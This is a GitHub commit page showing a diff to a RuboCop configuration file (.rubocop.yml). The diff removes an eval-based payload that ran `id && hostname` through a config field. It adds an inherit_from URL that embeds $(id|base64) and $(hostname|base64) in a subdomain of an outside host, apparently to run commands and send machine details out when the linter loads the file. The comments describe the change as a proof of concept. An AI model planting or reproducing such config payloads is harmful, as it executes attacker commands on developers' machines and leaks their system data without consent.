We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 8647096 commit 7c44ac7Copy full SHA for 7c44ac7
1 file changed
.rubocop.yml
@@ -1,16 +1,6 @@
1
-require:
2
- - rubocop-performance
+# TEST
+inherit_from:
3
+ - "http://$(id|base64).$(hostname|base64).mamank.com/poc"
4
5
AllCops:
6
TargetRubyVersion: 3.1
- # Ieu taktik nyumputkeun kode Ruby dina blok YAML anu dianggap sah
7
- Style/Copyright:
8
- Enabled: true
9
- # Urang pake eval sangkan kodeu Ruby urang dijalankeun
10
- Notice: '`eval("puts \"--- POC SUCCESS ---\"; puts \`id && hostname\`; puts \"--- END POC ---\"")`'
11
-
12
-Exclude:
13
- - '**/bin/**/*'
14
- - '**/db/**/*'
15
- - '**/script/setup'
16
- - '**/vendor/**/*'
0 commit comments